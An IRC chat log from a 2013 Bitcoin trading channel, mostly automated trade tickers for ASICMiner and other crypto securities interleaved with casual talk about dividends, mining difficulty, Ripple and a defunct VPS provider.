20:40:31 if there was a way to go back and change it I would, just hate getting "this username is already taken" May 21 20:40:41 so I stick with deadweasel, cos nobody wants to be that. May 21 20:40:45 :) May 21 20:43:46 haha ^^ May 21 20:44:01 [HAVELOCK] [ASICM] 36 @ 0.028 = 1.008 BTC [+] May 21 20:45:07 Going by the logs for the last day, ASICMiner and its passthroughs are the only security openly traded for BTC these days. May 21 20:45:12 [BTCTC] [ASICMINER-PT] 1 @ 2.50311 BTC [-] May 21 20:46:02 [HAVELOCK] [ASICM] 100 @ 0.0279 = 2.79 BTC [-] May 21 20:46:44 13:35:27 <@assbot> [BTCTC] [BITVPS] 3 @ 0.000697 = 0.0021 BTC [+] May 21 20:46:48 mostly May 21 20:46:52 bdk_kluge hey man May 21 20:46:58 long time May 21 20:47:01 [HAVELOCK] [ASICM] 35 @ 0.027 = 0.945 BTC [-] May 21 20:47:02 but yeah :) May 21 20:47:03 [HAVELOCK] [ASICM] 52 @ 0.0279 = 1.4508 BTC [+] May 21 20:47:04 [HAVELOCK] [ASICM] 109 @ 0.0279 = 3.0411 BTC [+] May 21 20:47:08 its on fire May 21 20:47:13 [BTCTC] [RSM] 2 @ 0.0128 = 0.0256 BTC [+] May 21 20:47:58 [BTCTC] [ASICMINER-PT] 1 @ 2.529999 BTC [+] May 21 20:48:01 [HAVELOCK] [ASICM] 25 @ 0.0279 = 0.6975 BTC [+] May 21 20:48:02 [HAVELOCK] [ASICM] 43 @ 0.0271 = 1.1653 BTC [-] May 21 20:48:04 [HAVELOCK] [ASICM] 19 @ 0.027 = 0.513 BTC [-] May 21 20:48:38 [BTCTC] [ASICMINER-PT] 2 @ 2.53 = 5.06 BTC [+] May 21 20:49:19 any1 kno why trading vol is so low durin these hrs? May 21 20:49:29 [BTCTC] [ASICMINER-PT] 1 @ 2.57 BTC [+] May 21 20:49:47 people at work? May 21 20:50:22 [BTCTC] [ASICMINER-PT] 1 @ 2.587 BTC [+] May 21 20:50:59 yea that makes sense... weird also these insane spikes seen to happen in early in the morn May 21 20:51:01 [HAVELOCK] [ASICM] 8 @ 0.0271 = 0.2168 BTC [+] May 21 20:51:02 [HAVELOCK] [ASICM] 17 @ 0.027 = 0.459 BTC [-] May 21 20:51:07 [BTCTC] [ASICMINER-PT] 1 @ 2.588 BTC [+] May 21 20:51:42 [BTCTC] [ASICMINER-PT] 1 @ 2.594 BTC [+] May 21 20:51:52 [BTCTC] [ASICMINER-PT] 1 @ 2.502001 BTC [-] May 21 20:51:59 [BTCTC] [ASICMINER-PT] 1 @ 2.594 BTC [+] May 21 20:52:24 [BTCTC] [ASICMINER-PT] 3 @ 2.594 = 7.782 BTC [+] May 21 20:52:45 [MPEX] [S.MPOE] 13900 @ 0.00065784 = 9.144 BTC [-] May 21 20:53:26 [BTCTC] [ASICMINER-PT] 1 @ 2.594 BTC [+] May 21 20:53:41 [BTCTC] [ASICMINER-PT] 1 @ 2.595 BTC [+] May 21 20:54:01 [BTCTC] [ASICMINER-PT] 2 @ 2.5409 = 5.0818 BTC [-] May 21 20:54:13 [BTCTC] [ASICMINER-PT] 1 @ 2.594999 BTC [+] May 21 20:54:15 [BTCTC] [ASICMINER-PT] 1 @ 2.6 BTC [+] May 21 20:54:27 [BTCTC] [ASICMINER-PT] 1 @ 2.541 BTC [-] May 21 20:55:01 [HAVELOCK] [HIM] 2 @ 2.2499 = 4.4998 BTC [+] May 21 20:55:32 [BTCTC] [ASICMINER-PT] 1 @ 2.541001 BTC [+] May 21 20:55:41 [BTCTC] [ASICMINER-PT] 1 @ 2.540901 BTC [-] May 21 20:55:47 [BTCTC] [ASICMINER-PT] 8 @ 2.5409 = 20.3272 BTC [-] May 21 20:55:51 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [-] May 21 20:55:59 [BTCTC] [ASICMINER-PT] 1 @ 2.502 BTC [-] May 21 20:56:01 [HAVELOCK] [HIM] 5 @ 2.25 = 11.25 BTC [+] May 21 20:56:06 [BTCTC] [RSM] 1 @ 0.0128 BTC [+] May 21 20:56:10 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] May 21 20:56:40 [BTCTC] [TAT.ASICMINER] 5 @ 0.0258 = 0.129 BTC [+] May 21 20:57:18 [BTCTC] [ASICMINER-PT] 9 @ 2.5 = 22.5 BTC [-] May 21 20:57:36 [BTCTC] [TAT.ASICMINER] 30 @ 0.02535 = 0.7605 BTC [-] May 21 20:58:24 [BTCTC] [ASICMINER-PT] 1 @ 2.499 BTC [-] May 21 20:58:27 [BTCTC] [TAT.ASICMINER] 10 @ 0.024713 = 0.2471 BTC [-] May 21 20:58:38 [BTCTC] [ASICMINER-PT] 11 @ 2.5 = 27.5 BTC [+] May 21 20:59:01 [HAVELOCK] [ASICM] 57 @ 0.0263 = 1.4991 BTC [-] May 21 20:59:02 [HAVELOCK] [ASICM] 3 @ 0.0262 = 0.0786 BTC [-] May 21 20:59:05 [BTCTC] [TAT.ASICMINER] 16 @ 0.0246 = 0.3936 BTC [-] May 21 21:00:01 [HAVELOCK] [ASICM] 1 @ 0.0263 BTC [+] May 21 21:01:01 [HAVELOCK] [ASICM] 57 @ 0.0262 = 1.4934 BTC [-] May 21 21:01:02 [HAVELOCK] [ASICM] 1 @ 0.02610042 BTC [-] May 21 21:01:04 [HAVELOCK] [ASICM] 414 @ 0.02550001 = 10.557 BTC [-] May 21 21:01:05 [HAVELOCK] [ASICM] 13 @ 0.0255 = 0.3315 BTC [-] May 21 21:01:06 [HAVELOCK] [ASICM] 192 @ 0.0254999 = 4.896 BTC [-] May 21 21:01:07 [HAVELOCK] [ASICM] 5 @ 0.0254999 = 0.1275 BTC [-] May 21 21:03:01 [HAVELOCK] [ASICM] 27 @ 0.024551 = 0.6629 BTC [-] May 21 21:03:02 [HAVELOCK] [ASICM] 300 @ 0.02455 = 7.365 BTC [-] May 21 21:04:01 [HAVELOCK] [ASICM] 10 @ 0.024552 = 0.2455 BTC [+] May 21 21:04:03 [HAVELOCK] [ASICM] 1 @ 0.024 BTC [-] May 21 21:04:04 [HAVELOCK] [ASICM] 58 @ 0.024 = 1.392 BTC [-] May 21 21:04:57 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] May 21 21:05:01 [HAVELOCK] [HIM] 5 @ 2.42 = 12.1 BTC [+] May 21 21:05:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.02545 BTC [+] May 21 21:06:24 [BTCTC] [ASICMINER-PT] 4 @ 2.5 = 10 BTC [+] May 21 21:08:59 [BTCTC] [BTC-BOND] 1 @ 0.010096 BTC [+] May 21 21:09:01 [HAVELOCK] [HIM] 2 @ 2.43 = 4.86 BTC [+] May 21 21:12:01 [HAVELOCK] [ASICM] 10 @ 0.0241 = 0.241 BTC [+] May 21 21:12:29 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] May 21 21:12:37 [BTCTC] [BTC-BOND] 9 @ 0.010096 = 0.0909 BTC [+] May 21 21:12:58 [BTCTC] [TAT.ASICMINER] 23 @ 0.02545 = 0.5854 BTC [+] May 21 21:13:01 [HAVELOCK] [HIM] 2 @ 2.45 = 4.9 BTC [+] May 21 21:15:01 [HAVELOCK] [HIM] 10 @ 2.5 = 25 BTC [+] May 21 21:15:27 [BTCTC] [BTC-BOND] 9 @ 0.010096 = 0.0909 BTC [+] May 21 21:18:18 lol, https://bitcointalk.org/index.php?topic=149458.msg2225212#msg2225212 May 21 21:18:24 "Starting to worry here too. Five missed promises is ok, but six is where I draw the line." May 21 21:20:33 [BTCTC] [BASIC-MINING] 1 @ 0.505001 BTC [-] May 21 21:20:37 [BTCTC] [BASIC-MINING] 3 @ 0.505 = 1.515 BTC [-] May 21 21:20:59 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] May 21 21:26:26 jesus https://bitcointalk.org/index.php?topic=211165.0;topicseen May 21 21:26:52 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] May 21 21:27:02 [HAVELOCK] [ASICM] 35 @ 0.024 = 0.84 BTC [-] May 21 21:27:57 "Yes Coins were premined which we are giving back to the community." May 21 21:27:58 hehehe May 21 21:28:01 [HAVELOCK] [HIM] 1 @ 2.6 BTC [+] May 21 21:28:07 through poker freerols May 21 21:28:12 srsly. May 21 21:28:14 relative: buying ripple May 21 21:28:29 jcpham arent you a bit late to the party May 21 21:28:44 i'm not sure how i can be late May 21 21:28:57 its bubbling rite now imo May 21 21:29:02 [HAVELOCK] [HIM] 1 @ 2.3 BTC [-] May 21 21:29:06 i've been buying ripple May 21 21:29:17 oic what you r saying May 21 21:29:24 price is retarded right now May 21 21:29:26 not interested in selling May 21 21:29:40 you think it will go back down? May 21 21:29:42 i do not May 21 21:30:01 [HAVELOCK] [ASICM] 10 @ 0.0263 = 0.263 BTC [+] May 21 21:30:11 yeah that system is as bad as users May 21 21:30:16 and users are idiots generally May 21 21:30:34 as if i care about technical merits May 21 21:30:53 this is a hooooooold operation May 21 21:31:03 [HAVELOCK] [HIM] 4 @ 2.3 = 9.2 BTC [-] May 21 21:32:02 [HAVELOCK] [VTX] 1 @ 0.4121008 BTC [-] May 21 21:33:02 [HAVELOCK] [SDICE] 3 @ 0.24999999 = 0.75 BTC [-] May 21 21:34:02 [HAVELOCK] [ASICM] 16 @ 0.0259 = 0.4144 BTC [-] May 21 21:34:37 [BTCTC] [ASICMINER-PT] 1 @ 2.547999 BTC [+] May 21 21:34:40 [BTCTC] [ASICMINER-PT] 4 @ 2.547999 = 10.192 BTC [+] May 21 21:35:01 [HAVELOCK] [ASICM] 1 @ 0.0259 BTC [-] May 21 21:36:54 [MPEX] [S.MPOE] 5950 @ 0.00067008 = 3.987 BTC [+] May 21 21:37:58 [BTCTC] [TAT.ASICMINER] 12 @ 0.0254 = 0.3048 BTC [-] May 21 21:39:08 [BTCTC] [ASICMINER-PT] 1 @ 2.548 BTC [+] May 21 21:43:25 [BTCTC] [ASICMINER-PT] 3 @ 2.548 = 7.644 BTC [+] May 21 21:45:35 [BTCTC] [ASICMINER-PT] 1 @ 2.548 BTC [+] May 21 21:47:27 mircea_popescu May 21 21:47:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.025088 BTC [-] May 21 21:47:38 [BTCTC] [TAT.ASICMINER] 59 @ 0.025088 = 1.4802 BTC [-] May 21 21:50:17 what actually caused ripples to go up so far? May 21 21:50:39 hopeium May 21 21:50:39 b0n1, manipulation! May 21 21:51:26 why? who is interested in ripples going up? May 21 21:52:05 umm the people that still have 99 billion of them May 21 21:52:06 ripple is not yet dead? May 21 21:52:17 b0n1, OpenCoin - see http://ripplescam.org/ May 21 21:53:24 well, actually i wouldn't call it a scam - it's just a FED replacement (debt based, central authority thing) May 21 21:54:36 well by defenition - what you mentioned is a scam by all rights May 21 21:55:19 make more of something, pretending that it is worth something, make even more , pretend it is worth even more May 21 21:55:44 ;;nethash May 21 21:55:46 until it is actually worth nothing, and go sonofabitch who saw that coming May 21 21:55:50 80626.1217655 May 21 21:56:11 whats ripple worth now? May 21 21:56:21 0 May 21 21:56:26 about 6300 ripple/btc May 21 21:56:33 or 0 IMO May 21 21:56:43 peeps think 6300 May 21 21:57:05 WTS ASICMINER shares! Pm me with offer May 21 21:57:43 27 mins since last block May 21 21:57:43 it's not a currency, it's just meant to be the fees, so how can it be worth more than a usd cent May 21 21:57:49 odd May 21 21:57:52 ripple is worth fuck all May 21 21:58:07 but last 4 by asic miner May 21 21:58:11 it can not, they are just hoping people can not figure that out May 21 21:58:31 i'll accept your ripples if you pay me 0.05 btc for every ripple you want to send to me - so my exchange rate is -0.05 May 21 21:58:54 I'll sell when its 1000:1 XRPBTC May 21 21:59:11 anybody want to give me feedback on a lame attempt at an escrow service? https://bitcointalk.org/index.php?topic=212319.new#new May 21 22:01:18 you should change your name to shadowweasel May 21 22:01:36 to fit your avatar May 21 22:01:44 and so i dont freak out and call you a scammer May 21 22:01:48 ;) May 21 22:02:30 is it possible to change Forum Name? Or is only Johnthedong allowed? May 21 22:02:42 scammer! May 21 22:02:42 [BTCTC] [TAT.ASICMINER] 11 @ 0.0254 = 0.2794 BTC [+] May 21 22:03:09 https://bitcointalk.org/index.php?topic=99497.msg2225900#msg2225900 TAT May 21 22:04:22 ;;bc,stats May 21 22:04:23 Current Blocks: 237236 | Current Difficulty: 1.1187257461360792E7 | Next Difficulty At Block: 237887 | Next Difficulty In: 651 blocks | Next Difficulty In About: 4 days, 8 hours, 9 minutes, and 36 seconds | Next Difficulty Estimate: 11823923.8035 | Estimated Percent Change: 5.691 May 21 22:05:02 [HAVELOCK] [HIM] 5 @ 2.3001 = 11.5005 BTC [+] May 21 22:05:26 I'll open a TAT.AM1000 on litecoinglonal May 21 22:05:34 litecoinglobal May 21 22:05:44 bitcoin is dead: http://ouishare.net/2013/05/bitcoin-human-based-digital-currency/ May 21 22:05:58 we need a new currency where "the monetary mass is continuously expanding and thus prevents a minority to hoard too much units at the expense of the others." May 21 22:06:49 freicoin? May 21 22:07:06 [HAVELOCK] [ASICM] 10 @ 0.0256 = 0.256 BTC [-] May 21 22:07:25 it';s mentioned, but above is about some not fully yet specified ouicoin May 21 22:08:01 [HAVELOCK] [HIM] 1 @ 2.59999 BTC [+] May 21 22:08:09 should i even read this? May 21 22:08:18 or does it amount to May 21 22:08:20 open UDC sounds interesting May 21 22:08:27 wah wah i gotz no bitcoins! May 21 22:09:00 ^ i think that's it May 21 22:10:02 [HAVELOCK] [ASICM] 65 @ 0.0255 = 1.6575 BTC [-] May 21 22:10:56 i read most of it since it thought they came with some sool mining algo May 21 22:11:05 but no, prolly not worth it May 21 22:11:59 just as a show of things to come from libertarians May 21 22:12:52 ok May 21 22:13:24 doesn't look like they tell any details on how they think it could work May 21 22:13:31 So suppose that AM was hashing on the side, May 21 22:13:40 and Avalon was using Batch 2 & 3 to hash May 21 22:13:43 what would prevent me from impersonating many humans to get more coins? May 21 22:13:48 and BFL wash hashing with all their wafers May 21 22:14:01 [HAVELOCK] [ASICM] 7 @ 0.0255 = 0.1785 BTC [-] May 21 22:14:06 yet May 21 22:14:14 everyone expects hashrate to climb very high May 21 22:14:18 soon TM May 21 22:14:35 wouldnt that make buying AM blades & USB miners May 21 22:14:38 a reasonable idea May 21 22:14:41 like May 21 22:14:49 hashrate went down recently May 21 22:15:01 maybe Avalon stopped hashing with Batch 2&3 May 21 22:15:05 and decided to ship May 21 22:18:03 [BTCTC] [GSDPT] 3 @ 0.00273 = 0.0082 BTC [+] May 21 22:23:06 [BTCTC] [ASICMINER-PT] 1 @ 2.5425 BTC [-] May 21 22:23:20 [BTCTC] [ASICMINER-PT] 1 @ 2.512001 BTC [-] May 21 22:23:35 https://bitcointalk.org/index.php?topic=208837.msg2226150#msg2226150 May 21 22:23:39 [BTCTC] [ASICMINER-PT] 2 @ 2.512 = 5.024 BTC [-] May 21 22:23:57 [BTCTC] [ASICMINER-PT] 1 @ 2.5012 BTC [-] May 21 22:26:01 [HAVELOCK] [HIM] 1 @ 2.3 BTC [-] May 21 22:26:13 hm, maybe Go can be used for mining by humans, computers are still quite inefficient at it May 21 22:27:14 [BTCTC] [TAT.ASICMINER] 5 @ 0.02529 = 0.1265 BTC [-] May 21 22:27:54 you play Go? May 21 22:29:01 [HAVELOCK] [HIM] 2 @ 2.22 = 4.44 BTC [-] May 21 22:30:01 [HAVELOCK] [ASICM] 19 @ 0.0255 = 0.4845 BTC [-] May 21 22:31:01 [HAVELOCK] [HIM] 3 @ 2.22 = 6.66 BTC [-] May 21 22:32:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.0254 BTC [+] May 21 22:37:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.0254 BTC [+] May 21 22:38:13 kakobrekla, just want to learn sometime May 21 22:38:49 the basics aren't hard May 21 22:39:00 only did similar game with pen/paper and was always defeated :( May 21 22:39:36 well, the easy rules makes it hard, coz endless amounts of possible moves May 21 22:42:01 [HAVELOCK] [ASICM] 1 @ 0.02549999 BTC [-] May 21 22:49:25 [BTCTC] [TAT.ASICMINER] 10 @ 0.02545 = 0.2545 BTC [+] May 21 22:50:37 [BTCTC] [TAT.ASICMINER] 4 @ 0.02545 = 0.1018 BTC [+] May 21 22:51:10 [BTCTC] [TAT.ASICMINER] 39 @ 0.02545 = 0.9926 BTC [+] May 21 22:52:01 [HAVELOCK] [SDICE] 5 @ 0.24000001 = 1.2 BTC [-] May 21 22:52:03 [HAVELOCK] [SDICE] 14 @ 0.24 = 3.36 BTC [-] May 21 22:53:01 [HAVELOCK] [SDICE] 3 @ 0.239 = 0.717 BTC [-] May 21 22:54:21 Sadly, I think this AM madness is just the beginning of the crazyness that will happen in the mining stock market. Judging by people's ability to discern even the most basic of information and learn a few simple rules, I'm guessing a lot of money will be thrown into the fire over the coming months. May 21 22:54:41 you are prolly right May 21 22:54:51 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] May 21 22:56:01 [HAVELOCK] [ASICM] 1 @ 0.02410001 BTC [-] May 21 22:56:02 [HAVELOCK] [ASICM] 9 @ 0.0241 = 0.2169 BTC [-] May 21 22:58:02 [BTCTC] [ASICMINER-PT] 1 @ 2.548998 BTC [+] May 21 22:58:16 [BTCTC] [ASICMINER-PT] 1 @ 2.548999 BTC [+] May 21 22:58:18 [BTCTC] [TAT.ASICMINER] 14 @ 0.02521 = 0.3529 BTC [-] May 21 23:00:36 [BTCTC] [TAT.ASICMINER] 36 @ 0.02543 = 0.9155 BTC [+] May 21 23:05:01 [HAVELOCK] [VTX] 7 @ 0.4121008 = 2.8847 BTC [-] May 21 23:06:01 [HAVELOCK] [ASICM] 1 @ 0.0259 BTC [+] May 21 23:06:29 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [+] May 21 23:07:01 [HAVELOCK] [ASICM] 102 @ 0.0259 = 2.6418 BTC [+] May 21 23:08:18 [BTCTC] [ASICMINER-PT] 5 @ 2.55 = 12.75 BTC [+] May 21 23:10:01 [HAVELOCK] [ASICM] 27 @ 0.02599 = 0.7017 BTC [+] May 21 23:10:51 [BTCTC] [TAT.ASICMINER] 25 @ 0.02543 = 0.6358 BTC [+] May 21 23:12:05 [BTCTC] [BASIC-MINING] 1 @ 0.539999 BTC [+] May 21 23:12:09 [BTCTC] [BASIC-MINING] 2 @ 0.54 = 1.08 BTC [+] May 21 23:13:08 [BTCTC] [ASICMINER-PT] 1 @ 2.500003 BTC [-] May 21 23:13:18 [BTCTC] [ASICMINER-PT] 1 @ 2.500002 BTC [-] May 21 23:13:22 [BTCTC] [ASICMINER-PT] 1 @ 2.500002 BTC [-] May 21 23:13:26 [BTCTC] [ASICMINER-PT] 7 @ 2.5 = 17.5 BTC [-] May 21 23:13:38 [BTCTC] [ASICMINER-PT] 29 @ 2.5 = 72.5 BTC [-] May 21 23:16:31 [BTCTC] [ASICMINER-PT] 1 @ 2.549999 BTC [+] May 21 23:18:22 [BTCTC] [TAT.ASICMINER] 33 @ 0.02543 = 0.8392 BTC [+] May 21 23:20:24 [BTCTC] [TAT.ASICMINER] 10 @ 0.02543 = 0.2543 BTC [+] May 21 23:21:32 [MPEX] [S.MPOE] 6150 @ 0.00067533 = 4.1533 BTC [+] May 21 23:21:36 [MPEX] [S.MPOE] 2750 @ 0.00067277 = 1.8501 BTC [-] May 21 23:23:17 [BTCTC] [ASICMINER-PT] 1 @ 2.500101 BTC [-] May 21 23:23:21 [BTCTC] [ASICMINER-PT] 1 @ 2.5001 BTC [-] May 21 23:23:26 [BTCTC] [ASICMINER-PT] 6 @ 2.5 = 15 BTC [-] May 21 23:23:44 [BTCTC] [TAT.ASICMINER] 10 @ 0.02545 = 0.2545 BTC [+] May 21 23:25:01 [HAVELOCK] [ASICM] 129 @ 0.0269 = 3.4701 BTC [+] May 21 23:28:22 WTS ASICMINER shares! Pm me with offer :) May 21 23:29:21 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] May 21 23:30:00 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [-] May 21 23:30:02 [HAVELOCK] [HIM] 1 @ 2.2 BTC [-] May 21 23:32:19 [BTCTC] [TAT.ASICMINER] 39 @ 0.02515 = 0.9809 BTC [-] May 21 23:33:01 [HAVELOCK] [ASICM] 179 @ 0.0269 = 4.8151 BTC [+] May 21 23:34:01 [HAVELOCK] [ASICM] 21 @ 0.0269 = 0.5649 BTC [+] May 21 23:36:01 [HAVELOCK] [SDICE] 1 @ 0.249 BTC [+] May 21 23:36:41 ThickAsThieves: you think difficulty will hit 35mil by the end of june? May 21 23:36:57 no May 21 23:38:00 [HAVELOCK] [HIM] 5 @ 2.1101 = 10.5505 BTC [-] May 21 23:38:03 [BTCTC] [TAT.ASICMINER] 27 @ 0.02545 = 0.6872 BTC [+] May 21 23:38:54 what futures are you investing in then May 21 23:38:59 or are you shorting May 21 23:39:01 [HAVELOCK] [HIM] 1 @ 2.11 BTC [-] May 21 23:39:34 [BTCTC] [S.DICE-PT] 3 @ 0.002791 = 0.0084 BTC [-] May 21 23:39:38 my futures were purchased privately May 21 23:39:58 [BTCTC] [GSDPT] 1 @ 0.0026 BTC [-] May 21 23:40:16 [BTCTC] [GSDPT] 10 @ 0.0026 = 0.026 BTC [-] May 21 23:40:27 ang are for july May 21 23:40:32 and* May 21 23:41:17 [BTCTC] [TAT.ASICMINER] 11 @ 0.02545 = 0.28 BTC [+] May 21 23:42:01 [BTCTC] [BITVPS] 28 @ 0.000799 = 0.0224 BTC [+] May 21 23:42:18 [BTCTC] [TAT.ASICMINER] 9 @ 0.02545 = 0.2291 BTC [+] May 21 23:47:06 [BTCTC] [BTC-BOND] 1 @ 0.010096 BTC [+] May 21 23:47:47 looks like they found the spamhaus ddoser: http://www.guardian.co.uk/technology/2013/may/20/man-accused-breaking-the-internet May 21 23:48:36 fiat500: you think it will get >20m ? i have some futures for sale ;) May 21 23:48:55 jurov: i saw ur futures on bitfunder May 21 23:49:03 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] May 21 23:50:01 [HAVELOCK] [SDICE] 2 @ 0.24 = 0.48 BTC [-] May 21 23:50:03 [HAVELOCK] [SDICE] 5 @ 0.239 = 1.195 BTC [-] May 21 23:50:26 and? May 21 23:50:46 thinking about it May 21 23:51:58 ;;bc,stats May 21 23:51:59 Current Blocks: 237241 | Current Difficulty: 1.1187257461360792E7 | Next Difficulty At Block: 237887 | Next Difficulty In: 646 blocks | Next Difficulty In About: 4 days, 10 hours, 11 minutes, and 30 seconds | Next Difficulty Estimate: 11770003.2175 | Estimated Percent Change: 5.20901 May 21 23:53:44 [BTCTC] [BITVPS] 2 @ 0.000799 = 0.0016 BTC [+] May 21 23:53:53 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [-] May 21 23:56:18 Hello May 21 23:58:00 [HAVELOCK] [ASICM] 12 @ 0.02749999 = 0.33 BTC [+] May 21 23:58:02 [HAVELOCK] [ASICM] 138 @ 0.0275 = 3.795 BTC [+] May 21 23:59:23 Sheesh May 22 00:00:15 whats up? May 22 00:02:03 High price, that's all May 22 00:05:49 yea pretty nuts May 22 00:05:53 dividend tomorrow for asciminer right ? May 22 00:07:17 yep May 22 00:07:59 im dreading the big crash tomorrow after divs are out May 22 00:08:16 not gonna happen May 22 00:08:24 oh shit May 22 00:08:35 they added another 3TH/s May 22 00:09:11 how are you estimating the solomining? May 22 00:09:32 http://www.asicminercharts.com/ May 22 00:10:33 Why would it crash after divs are paid? May 22 00:11:25 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] May 22 00:11:39 [BTCTC] [ASICMINER-PT] 8 @ 2.5 = 20 BTC [-] May 22 00:11:42 I wonder if they'll be as good as last weeks. May 22 00:11:51 thats what everyone is wondering May 22 00:12:07 i don't think it will crash soon... unless some shinier object appears May 22 00:12:14 or theft happens May 22 00:12:38 Willdude123: if they are considerably worse May 22 00:12:46 Are they announced at midnight or something? May 22 00:12:47 in the shiny objects dept - watch out for bitfury May 22 00:12:53 ThickAsThieves: i know thats what im asking about May 22 00:13:01 are they listed anywhere? May 22 00:13:03 you say solomining (est) but where is that estimate from May 22 00:13:06 jurov: 100TH? May 22 00:13:20 aknap3: thats not been approved on btct May 22 00:13:39 fiat500 May 22 00:13:44 https://picostocks.com/docs/index/19 May 22 00:13:45 [BTCTC] [TAT.ASICMINER] 10 @ 0.02545 = 0.2545 BTC [+] May 22 00:13:49 the blocks mined by asicminer are trackable May 22 00:13:55 [BTCTC] [ASICMINER-PT] 3 @ 2.481001 = 7.443 BTC [-] May 22 00:13:58 so someone mustve written a cript May 22 00:14:02 script May 22 00:14:07 At what time will the div be announced? May 22 00:14:12 [BTCTC] [ASICMINER-PT] 2 @ 2.4803 = 4.9606 BTC [-] May 22 00:14:14 [BTCTC] [TAT.ASICMINER] 39 @ 0.02545 = 0.9926 BTC [+] May 22 00:14:19 usually around 12pm EST May 22 00:14:30 [BTCTC] [ASICMINER-PT] 1 @ 2.4802 BTC [-] May 22 00:14:49 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [-] May 22 00:15:17 [BTCTC] [TAT.ASICMINER] 17 @ 0.02545 = 0.4327 BTC [+] May 22 00:15:39 So 6pm British Summer Time? May 22 00:15:49 they have summer? May 22 00:16:16 [BTCTC] [GSDPT] 10 @ 0.00284 = 0.0284 BTC [+] May 22 00:16:55 [BTCTC] [GSDPT] 90 @ 0.00285 = 0.2565 BTC [+] May 22 00:17:01 [HAVELOCK] [ASICM] 2 @ 0.0278 = 0.0556 BTC [+] May 22 00:18:04 Cause we don't May 22 00:18:37 *course May 22 00:19:01 [HAVELOCK] [ASICM] 100 @ 0.0273 = 2.73 BTC [-] May 22 00:19:02 [HAVELOCK] [ASICM] 10 @ 0.02720001 = 0.272 BTC [-] May 22 00:19:04 [HAVELOCK] [ASICM] 107 @ 0.0272 = 2.9104 BTC [-] May 22 00:19:05 [HAVELOCK] [ASICM] 12 @ 0.027 = 0.324 BTC [-] May 22 00:19:15 [BTCTC] [BITVPS] 140 @ 0.000799 = 0.1119 BTC [+] May 22 00:19:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.0259 BTC [+] May 22 00:19:28 LOL May 22 00:20:00 I wonder if bitvps will ever pay dividends. May 22 00:20:12 [BTCTC] [GSDPT] 1 @ 0.00285 BTC [+] May 22 00:20:49 Willdude123: i dont understand their accounting May 22 00:21:17 Willdude123: they already paid everything: https://bitcointalk.org/index.php?topic=85975.0 May 22 00:21:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.0259 BTC [+] May 22 00:22:01 [HAVELOCK] [ASICM] 32 @ 0.02700001 = 0.864 BTC [+] May 22 00:22:06 heh both rg and brendio went into exile May 22 00:22:06 [BTCTC] [TAT.ASICMINER] 59 @ 0.02545 = 1.5016 BTC [-] May 22 00:22:14 [BTCTC] [ASICMINER-PT] 1 @ 2.499999 BTC [+] May 22 00:22:39 https://btct.co/security/BITVPS show none May 22 00:22:47 Shows May 22 00:22:56 [BTCTC] [ASICMINER-PT] 1 @ 2.499999 BTC [+] May 22 00:22:58 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] May 22 00:23:26 [BTCTC] [ASICMINER-PT] 4 @ 2.5 = 10 BTC [+] May 22 00:23:32 [BTCTC] [S.DICE-PT] 2 @ 0.003379 = 0.0068 BTC [+] May 22 00:23:42 yes, no wonder after the sordid history May 22 00:23:59 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] May 22 00:24:12 [BTCTC] [S.BBET-PT] 1 @ 0.01974 BTC [+] May 22 00:24:30 dude, just forget about bitvps. May 22 00:24:51 [BTCTC] [TAT.ASICMINER] 10 @ 0.02594 = 0.2594 BTC [+] May 22 00:25:08 exile? rg is still around on otc May 22 00:25:28 jurov: what sordid history May 22 00:25:29 he actually had to change his gpg identity May 22 00:25:37 lolwut May 22 00:25:44 oh, so i should go into the story for newbs? May 22 00:25:45 [BTCTC] [TAT.ASICMINER] 47 @ 0.02594 = 1.2192 BTC [+] May 22 00:26:01 [HAVELOCK] [ASICM] 91 @ 0.02700002 = 2.457 BTC [+] May 22 00:26:05 [BTCTC] [BTC-TRADING-PT] 2 @ 0.2559 = 0.5118 BTC [-] May 22 00:26:10 [BTCTC] [BITVPS] 11 @ 0.000799 = 0.0088 BTC [+] May 22 00:26:19 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [+] May 22 00:26:26 [BTCTC] [TAT.ASICMINER] 40 @ 0.02594 = 1.0376 BTC [+] May 22 00:26:29 full disclosure: i ran coinbr on bitvps for 3 months, then fled away May 22 00:26:41 jurov: icant do anything about not having been here when this drama happened May 22 00:26:49 [BTCTC] [ASICMINER-PT] 3 @ 2.5 = 7.5 BTC [+] May 22 00:27:08 bad hw? May 22 00:27:18 so, under rg, all was mostly fine from the beginning,it IPOed on mpex, paid nice divs May 22 00:27:29 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] May 22 00:27:45 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] May 22 00:27:59 then rg decided he prefers to get a job, so that he can promote and fire people (im srs, i have the logs) May 22 00:28:09 and bitvps got neglected May 22 00:28:19 after his employer refused to bring it in May 22 00:28:28 [BTCTC] [TAT.ASICMINER] 30 @ 0.026248 = 0.7874 BTC [+] May 22 00:28:46 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [+] May 22 00:28:47 [BTCTC] [TAT.ASICMINER] 8 @ 0.026248 = 0.21 BTC [+] May 22 00:29:14 [BTCTC] [ASICMINER-PT] 3 @ 2.5 = 7.5 BTC [+] May 22 00:29:19 so after few some arduous months in nov 2012 he handed bitvps for free to May 22 00:29:23 btw if u want a provider that offers hosting for BTC, waveride.at 